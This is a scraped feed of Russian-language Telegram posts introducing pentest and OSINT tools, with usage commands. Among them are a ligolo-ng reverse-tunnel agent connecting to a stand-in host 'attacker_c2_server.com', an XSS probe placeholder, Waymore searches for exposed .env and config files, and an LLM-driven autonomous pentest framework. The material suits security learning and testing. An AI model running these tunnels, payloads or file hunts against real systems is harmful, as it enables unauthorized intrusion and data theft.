Gixy — это open source-анализатор конфигураций Nginx, который помогает находить потенциальные уязвимости, ошибки и небезопасные настройки. Инструмент особенно полезен как для DevOps задач так и для проведения пентеста web-инфраструктуры. Он автоматически проверяет конфигурационные файлы и выявляет проблемы, которые могут привести к утечкам данных, обходу ограничений или выполнению вредоносных запросов.
Основные возможности
Gixy анализирует конфигурацию Nginx и применяет набор правил для поиска проблем:
Инструмент находит проблемы, связанные с:
Установка
pip3 install gixy-next
Запуск проверки
gixy /etc/nginx/nginx.conf
Проверка директории
gixy /etc/nginx/
#nginx #security #devops #pentest #web #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13🔥6👍5
ParamSpider: Инструмент для извлечения URL из веб-архивов
👉 Основные функции
- Cбор ссылок из Wayback Machine для указанного домена
- Автоматическое исключение статических и неинтересных расширений (изображения, стили, скрипты)
- Поддержка сканирования нескольких доменов из файла
- Отображение URL в реальном времени
- Возможность работы через прокси-сервер
- Замена значений параметров для последующего фаззинга
⬇️ Установка
Проверка
⏺️ Поиск URL для одного домена
Результат сохраняется в файл results/example.com.txt
⏺️ Поиск URL для нескольких доменов из файла
Файл domains.txt должен содержать список доменов (по одному на строку)
⏺️ Потоковый вывод в терминал
URL отображаются в реальном времени без сохранения в файл
⏺️ Использование прокси
⏺️ Настройка плейсхолдера для параметров
Значение плейсхолдера используется для замены значений параметров, что удобно для последующего тестирования на XSS или другие инъекции
🔎 ParamSpider часто используется в комбинации с инструментами для:
- Фаззинга параметров (ffuf, wfuzz)
- Проверки доступности (httpx, httprobe)
- Сканирования уязвимостей (nuclei, dalfox)
- Анализа параметров (kxss, gf)
#ParamSpider #Fuzzing #WaybackMachine #pentest #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
ParamSpider — утилита с открытым исходным кодом, предназначенная для извлечения URL-адресов, связанных с целевым доменом, из веб-архивов (Wayback Machine). Инструмент автоматически фильтрует «неинтересные» URL, позволяя исследователям безопасности сосредоточиться на потенциально значимых конечных точках для дальнейшего анализа, фаззинга и тестирования.
- Cбор ссылок из Wayback Machine для указанного домена
- Автоматическое исключение статических и неинтересных расширений (изображения, стили, скрипты)
- Поддержка сканирования нескольких доменов из файла
- Отображение URL в реальном времени
- Возможность работы через прокси-сервер
- Замена значений параметров для последующего фаззинга
sudo apt install paramspider
Проверка
paramspider -h
paramspider -d example.com
Результат сохраняется в файл results/example.com.txt
paramspider -l domains.txt
Файл domains.txt должен содержать список доменов (по одному на строку)
paramspider -d example.com -s
URL отображаются в реальном времени без сохранения в файл
paramspider -d example.com --proxy '127.0.0.1:7890'
paramspider -d example.com -p '"><h1>reflection</h1>'
Значение плейсхолдера используется для замены значений параметров, что удобно для последующего тестирования на XSS или другие инъекции
- Фаззинга параметров (ffuf, wfuzz)
- Проверки доступности (httpx, httprobe)
- Сканирования уязвимостей (nuclei, dalfox)
- Анализа параметров (kxss, gf)
#ParamSpider #Fuzzing #WaybackMachine #pentest #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥7❤6
Простой, легкий и быстрый инструмент, который позволяет пентестерам создавать туннели на основе обратного TCP/TLS-соединения с использованием интерфейса tun (без необходимости в SOCKS). Поддерживаются протоколы TCP, UDP, ICMP.
Пакеты, отправляемые в TUN-интерфейс при запуске прокси-сервера, транслируются и затем передаются в удалённую сеть агента.
Например, для TCP-соединения процесс работает следующим образом:
Такой механизм позволяет использовать инструменты, например Nmap, без необходимости использования proxychains.
Можно произвести установку из репозитория Kali Linux :
apt install ligolo-ng. Или собрать через go:
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go
При использовании в Linux необходимо создать интерфейс tun на прокси-сервере:
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
Далее необходимо запустить прокси-сервер на своем сервере (порт по умолчанию 11601):
./proxy -autocert
./proxy -selfcert
После этого запускается агент на целевой системе:
./agent -connect attacker_c2_server.com:11601
После подключения агента на прокси-сервере появится новая сессия:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000
Через команду
session необходимо выбрать нужного агента и далее запустить туннелирование на прокси-сервере, используя имя интерфейса.#tools #tun #pentest #network
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍8🔥6
PacketSender: Утилита для отправки и приема сетевых пакетов
🎇 Основные функции
- Поддержка протоколов (TCP, UDP, SSL (TLS), HTTP/HTTPS)
- Режимы работы - клиент (отправка) и сервер (прослушивание)
- Генератор интенсивного трафика (нагрузочное тестирование с настраиваемой скоростью)
- Поддержка макросов (подстановка даты, времени, счетчика и случайных значений)
- Панели управления - создание кнопочных панелей для быстрого выполнения команд
⬇️ Установка
Проверка
1️⃣ Примеры использования CLI
⏺️ Отправка UDP
⏺️ Режим сервера (прослушивание TCP)
⏺️ Генератор интенсивного трафика (20 Гц)
⏺️ Отладка сетевого сервера
⏺️ Проверка SSL/TLS соединения
⏺️ Нагрузочное тестирование
2️⃣ Использование графического интерфейса (GUI). Основные элементы:
▶️ Поля ввода (имя пакета, данные (ASCII/HEX), адрес, порт)
▶️ Выбор протокола (TCP, UDP, SSL, HTTP GET, HTTP POST)
▶️ Таблица сохраненных пакетов - двойной клик для редактирования
▶️ Кнопка отправки - выполнение выбранного пакета
▶️ Лог трафика (отображение отправленных и полученных данных)
▶️ Индикаторы серверов (UDP, TCP, SSL серверы с отображением портов)
#PacketSender #NetworkTesting #TCP #UDP #pentest #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
PacketSender — это кроссплатформенное приложение с открытым исходным кодом, предназначенное для отправки и приема TCP, UDP, SSL-пакетов, а также HTTP/HTTPS-запросов. Инструмент предоставляет графический интерфейс и возможности командной строки, позволяя тестировать сетевое взаимодействие, отлаживать серверные приложения и выполнять диагностику сетевых протоколов.
- Поддержка протоколов (TCP, UDP, SSL (TLS), HTTP/HTTPS)
- Режимы работы - клиент (отправка) и сервер (прослушивание)
- Генератор интенсивного трафика (нагрузочное тестирование с настраиваемой скоростью)
- Поддержка макросов (подстановка даты, времени, счетчика и случайных значений)
- Панели управления - создание кнопочных панелей для быстрого выполнения команд
sudo apt install packetsender
Проверка
packetsender —h
packetsender -u 192.168.1.100 8080 "Hello UDP"
packetsender -l -t -b 8080
packetsender --rate 20 --name "Test Packet"
#режим сервера для приема данных
packetsender -l -t -b 9999
#отправка тестовых данных из другого окна
packetsender -t localhost 9999 "TEST"
packetsender -s expired.packetsender.com 443 "GET / HTTP/1.0\r\n\r\n"
packetsender --bps 1000000 --num 10000 --name "Status Check"
#PacketSender #NetworkTesting #TCP #UDP #pentest #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍6🔥4😁1
PentestAgent
⏺️ PentestAgent — это передовой фреймворк для автоматизированного пентеста, который использует большие языковые модели (LLM) и мультиагентную архитектуру для выполнения задач по тестированию на проникновение с минимальным участием человека. Существует две основные версии продукта: академическая (исследовательский проект) и практическая (инструмент для реального использования).
🧠 Академическая версия:
Это оригинальный проект, представленный на конференции ACM AsiaCCS группой исследователей из Северо-Западного университета, Чжэцзянского университета и Ant Group. Фреймворк построен на мультиагентной коллаборации, где каждый агент отвечает за свой этап пентеста в соответствии со стандартом PTES (Penetration Testing Execution Standard): Reconnaissance Agent, Search Agent, Planning Agent и Execution Agent
Исследователи создали бенчмарк на основе 67 целей из VulHub и HackTheBox (различные CWE и уровни сложности). Результаты при использовании GPT-4 :
➡️ Общая успешность: 74.2% (у GPT-3.5 — 60.6%)
➡️ Простые задачи: 100% завершения на этапах разведки и анализа
➡️ Сложные задачи: успешность снижается до 50% на этапе разведки
Сравнение с PentestGPT показало значительное преимущество в скорости: этап разведки занял 220 секунд против 1199 секунд.
🔑 Практическая версия:
Параллельно с академическим проектом существует активно развивающийся open-source инструмент от сообщества GH05TCREW на GitHub.
❗️ Требования: Python 3.10+, API ключ OpenAI, Anthropic или другого провайдера (поддерживается LiteLLM)
⛓️💥 Запуск:
Режим работы:
⏺️ /assist - Единичный запрос с выполнением инструментов
⏺️ /agent - Автономное выполнение одной задачи
⏺️ /crew - Мультиагентный режим
⏺️ /interact - Интерактивный режим с подсказками
❓ Как считаете, способен данный продукт полностью автоматизировать пентест?
#pentestagemt #ai #pentest #python #openai
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Это оригинальный проект, представленный на конференции ACM AsiaCCS группой исследователей из Северо-Западного университета, Чжэцзянского университета и Ant Group. Фреймворк построен на мультиагентной коллаборации, где каждый агент отвечает за свой этап пентеста в соответствии со стандартом PTES (Penetration Testing Execution Standard): Reconnaissance Agent, Search Agent, Planning Agent и Execution Agent
Исследователи создали бенчмарк на основе 67 целей из VulHub и HackTheBox (различные CWE и уровни сложности). Результаты при использовании GPT-4 :
Сравнение с PentestGPT показало значительное преимущество в скорости: этап разведки занял 220 секунд против 1199 секунд.
Параллельно с академическим проектом существует активно развивающийся open-source инструмент от сообщества GH05TCREW на GitHub.
git clone https://github.com/GH05TCREW/pentestagent.git
cd pentestagent
./scripts/setup.sh
pentestagent -t 192.168.1.1
Режим работы:
#pentestagemt #ai #pentest #python #openai
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9🔥4👍3😁2
Qu1cksc0pe: Многофункциональный инструмент для статического и динамического анализа вредоносного ПО
🧿 Поддерживаемые форматы файлов
- Windows (.exe, .dll, .msi, .bin)
- Linux (.elf, .bin)
- macOS (mach-o)
- Android (.apk, .jar, .dex)
- Документы (.doc, .docm, .docx, .xls, .xlsx, .pdf, .rtf, .one)
- Скрипты (VBScript/VBA (.vbs, .vbe, .vba), PowerShell)
- Архивы (.zip, .rar)
⬇️ Установка
Проверка
⏺️ Базовый анализ
⏺️ Быстрый анализ подозрительного EXE-файла
⏺️ Глубокий анализ документа с извлечением макросов
⏺️ Проверка APK на наличие вредоносного поведения
⏺️ Пакетное сканирование коллекции образцов
⏺️ Извлечение индикаторов компрометации
#Qu1cksc0pe #StaticAnalysis #DynamicAnalysis #tool #pentest #MITRE
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Qu1cksc0pe — это универсальная платформа с открытым исходным кодом для статического и динамического анализа вредоносного программного обеспечения. Инструмент предназначен для исследования широкого спектра файлов: от исполняемых binaries Windows, Linux и macOS до документов, APK-файлов, архивов и сценариев PowerShell. Основная цель — предоставить исследователям безопасности максимальный объем информации о подозрительных файлах, помогая понять их функциональность и потенциальные угрозы.
- Windows (.exe, .dll, .msi, .bin)
- Linux (.elf, .bin)
- macOS (mach-o)
- Android (.apk, .jar, .dex)
- Документы (.doc, .docm, .docx, .xls, .xlsx, .pdf, .rtf, .one)
- Скрипты (VBScript/VBA (.vbs, .vbe, .vba), PowerShell)
- Архивы (.zip, .rar)
pipх install quickscope
Проверка
quickscope -h
python quickscope --file suspicious_file.exe --analyze
python quickscope --file unknown_sample.exe --analyze --vtFile
python quickscope --file invoice.doc --docs
#cтатический анализ
python quickscope --file malicious.apk --analyze
#динамический анализ (с подключенным устройством)
python quickscope --file malicious.apk --watch
python quickscope --folder ./malware_collection --hashscan
python quickscope --file suspicious_sample.exe --analyze --report | jq '.iocs'
#Qu1cksc0pe #StaticAnalysis #DynamicAnalysis #tool #pentest #MITRE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍8❤5
WebSift
📐 Функции
📉 Собирает адреса электронной почты с заданного веб-сайта.
📉 Извлекает номера телефонов в стандартных форматах.
📉 Собирает ссылки на социальные сети и другие URL-адреса с веб-сайтов для расширения возможностей OSINT.
🖱 Сохраняет извлеченную информацию для дальнейшего анализа.
⬇️ Установка:
🔗 Клонируем репозиторий и переходим в рабочую директорию:
⛓️💥 Запуск:
#web #pentest #OSINT
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
WebSift — это мощный инструмент для этичного хакинга и OSINT, предназначенный для извлечения адресов электронной почты, номеров телефонов, ссылок на социальные сети и другие ссылки с веб-сайтов. Он разработан для систем на базе Termux и Linux. Этот инструмент идеально подходит для специалистов по безопасности и исследователей, которым необходимо собирать общедоступную информацию в этических и правовых целях.
git clone https://github.com/s-r-e-e-r-a-j/WebSift.git
cd WebSift/
cd WebSift/
bash websift.sh
#web #pentest #OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍6🔥5
DNSDiag: Набор инструментов для измерения, диагностики и аудита безопасности DNS
🔎 Возможности
- Мониторинг производительности DNS (измерение времени ответа, джиттера и потери пакетов)
- Поддержка современных протоколов (UDP, TCP, DNS-over-TLS, DNS-over-HTTPS, DNS-over-QUIC, DNS-over-HTTP/3)
- Обнаружение возможного перенаправления или перехвата DNS-трафика
- Проверка поддержки DNSSEC и отображение флагов аутентификации
- Поддержка EDNS Client Subnet, DNS Cookies, NSID
- Одновременное тестирование множества DNS-серверов с детальной статистикой
⬇️ Установка
Проверка
1️⃣ Инструмент dnsping - позволяет отправлять произвольные DNS-запросы к указанному серверу и измерять время ответа, аналогично утилите ping
⏺️ Базовый ping DNS-сервера
⏺️ Ping с DNSSEC и отображением флагов
⏺️ Тихий режим (только статистика)
2️⃣ Инструмент dnstraceroute - трассирует путь DNS-запроса до целевого сервера, позволяя выявить возможный перехват или перенаправление трафика
⏺️ Базовая трассировка
⏺️ Трассировка с ASN информацией
3️⃣ Инструмент dnseval - выполняет сравнительный анализ множества DNS-серверов, отправляя запросы к каждому и собирая статистику производительности
⏺️ Оценка публичных DNS-серверов
⏺️ Сравнение с DNSSEC
⏺️ Анализ результатов через jq
#DNSDiag #DNSSEC #DNS #tool #pentest #DoQ
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
DNSDiag — это набор утилит с открытым исходным кодом для измерения производительности DNS-серверов, диагностики проблем с резолвингом и аудита безопасности DNS-трафика. Инструментарий включает три основных компонента: dnsping для измерения задержек и надежности DNS-серверов, dnstraceroute для трассировки пути DNS-запросов и dnseval для сравнительного анализа множества резолверов.
- Мониторинг производительности DNS (измерение времени ответа, джиттера и потери пакетов)
- Поддержка современных протоколов (UDP, TCP, DNS-over-TLS, DNS-over-HTTPS, DNS-over-QUIC, DNS-over-HTTP/3)
- Обнаружение возможного перенаправления или перехвата DNS-трафика
- Проверка поддержки DNSSEC и отображение флагов аутентификации
- Поддержка EDNS Client Subnet, DNS Cookies, NSID
- Одновременное тестирование множества DNS-серверов с детальной статистикой
pipх install dnsdiag
Проверка
dnsdiag -h
dnsping -c 5 -s 8.8.8.8 google.com
dnsping -c 3 --dnssec --flags -s 8.8.8.8 cloudflare.com
dnsping -c 10 -q -s 1.1.1.1 github.com
dnstraceroute -s 8.8.8.8 google.com
dnstraceroute --asn -s 1.1.1.1 cloudflare.com
dnseval -f public-servers.txt -c 10 github.com
dnseval --dnssec -c 10 -f public-servers.txt ripe.net
cat results.jsonl | jq -r 'select(.data.r_lost_percent == 0) | .data.resolver'
#DNSDiag #DNSSEC #DNS #tool #pentest #DoQ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤8🔥6
Waymore: Инструмент для извлечения URL и контента из веб-архивов
↗️ Возможности
- Поддержка множества источников (Wayback Machine, Common Crawl, Alien Vault OTX, URLScan, VirusTotal, GhostArchive)
- Два режима работы: получение только URL (U), загрузка только ответов (R) или оба режима (B)
- Гибкая фильтрация (по HTTP-статусам, MIME-типам, ключевым словам и регулярным выражениям)
- Фильтрация результатов по временному диапазону
- Настройка таймаутов, количества попыток и параллельных процессов
- Возобновление прерванных загрузок ответов
- Отправка уведомлений в Discord и Telegram по завершении
⬇️ Установка
Проверка
⏺️ Получение всех URL для домена
⏺️ Полный сбор данных для нового домена (режим В)
⏺️ Мониторинг новых URL с течением времени
⏺️ Поиск конфиденциальных файлов
⏺️ Анализ истории изменений (по месяцам)
⏺️ Быстрая проверка перед глубоким сканированием
⏺️ Конвейерная передача в другие инструменты
#Waymore #OSINT #tool #pentest
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Waymore — утилита с открытым исходным кодом для извлечения URL-адресов и загрузки архивных ответов из нескольких источников: Wayback Machine, Common Crawl, Alien Vault OTX, URLScan, VirusTotal, GhostArchive. Инструмент предназначен для сбора данных о целевом домене, включая ссылки на ресурсы и сохраненные версии веб-страниц, что полезно для анализа поверхности атаки, поиска уязвимостей и OSINT-исследований.
- Поддержка множества источников (Wayback Machine, Common Crawl, Alien Vault OTX, URLScan, VirusTotal, GhostArchive)
- Два режима работы: получение только URL (U), загрузка только ответов (R) или оба режима (B)
- Гибкая фильтрация (по HTTP-статусам, MIME-типам, ключевым словам и регулярным выражениям)
- Фильтрация результатов по временному диапазону
- Настройка таймаутов, количества попыток и параллельных процессов
- Возобновление прерванных загрузок ответов
- Отправка уведомлений в Discord и Telegram по завершении
pipх install waymore
Проверка
waymore -h
waymore -i example.com -mode U
waymore -i target.com -mode B -mc 200 -mt text/html,application/json -l 10000
#первый запуск
waymore -i target.com -mode U -oU urls.txt
#последующие запуски
waymore -i target.com -mode U -oU urls.txt -nlf
waymore -i target.com -ko '\.(env|config|json|xml|sql|log)($|\?)' -mode U
waymore -i target.com -mode R -ci m -mc 200
waymore -i target.com --check-only
waymore -i example.com -mode U | unfurl keys | sort -u
#Waymore #OSINT #tool #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤5🔥5
Unblob: Инструмент для извлечения данных из бинарных контейнеров
👉 Основные функции
- Поддержка 78+ форматов (SquashFS, JFFS2, UBI/UBIFS, ext, CPIO, ZIP, 7-Zip, gzip, XZ, LZMA, LZ4 и другие)
- Автоматическая обработка вложенных контейнеров до заданной глубины (по умолчанию 10)
- Идентификация начала и конца каждого фрагмента в соответствии со спецификацией формата
- Автоматическое определение и сохранение данных, не соответствующих известным форматам
- Генерация структурированных метаданных о найденных фрагментах
- Возможность добавления собственных обработчиков форматов
⬇️ Установка
Проверка
⏺️ Базовое извлечение
Результат сохраняется в директорию firmware.bin_extract/
⏺️ Анализ прошивки маршрутизатора
⏺️ Извлечение с ограничением глубины и принудительной перезаписью
⏺️ Анализ неизвестного бинарного файла (только выделение фрагментов)
⏺️ Работа с большим количеством файлов (многопроцессорность)
🎇 Unblob по умолчанию пропускает следующие типы файлов (можно изменить через --clear-skip-magics):
- BFLT, Erlang BEAM, GIF, JPEG, MPEG
- Microsoft Office документы (Word, Excel, PowerPoint)
- PDF, PNG, SQLite, TrueType Fonts
- Windows Embedded CE binary image, Java class, Python magic binary
- И другие медиа- и офисные форматы
#Unblob #FirmwareAnalysis #tool #pentest
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Unblob — утилита с открытым исходным кодом для рекурсивного извлечения содержимого из неизвестных бинарных блоков (blob). Инструмент поддерживает более 78 форматов архивов, сжатых потоков и файловых систем, автоматически определяет границы вложенных контейнеров и выделяет неизвестные фрагменты. Unblob предназначен для анализа, обратной разработки и извлечения прошивок встраиваемых систем, бинарных образов и других составных файлов.
- Поддержка 78+ форматов (SquashFS, JFFS2, UBI/UBIFS, ext, CPIO, ZIP, 7-Zip, gzip, XZ, LZMA, LZ4 и другие)
- Автоматическая обработка вложенных контейнеров до заданной глубины (по умолчанию 10)
- Идентификация начала и конца каждого фрагмента в соответствии со спецификацией формата
- Автоматическое определение и сохранение данных, не соответствующих известным форматам
- Генерация структурированных метаданных о найденных фрагментах
- Возможность добавления собственных обработчиков форматов
pipx install unblob
Проверка
unblob -h
unblob firmware.bin
Результат сохраняется в директорию firmware.bin_extract/
unblob -e router_extracted -n 2 --report router_report.json router_firmware.bin
unblob -f -d 3 large_firmware.bin
unblob -s --report chunks_report.json unknown.bin
unblob -p 8 -e /data/extracted /data/images/firmware.bin
- BFLT, Erlang BEAM, GIF, JPEG, MPEG
- Microsoft Office документы (Word, Excel, PowerPoint)
- PDF, PNG, SQLite, TrueType Fonts
- Windows Embedded CE binary image, Java class, Python magic binary
- И другие медиа- и офисные форматы
#Unblob #FirmwareAnalysis #tool #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤6👍6👎1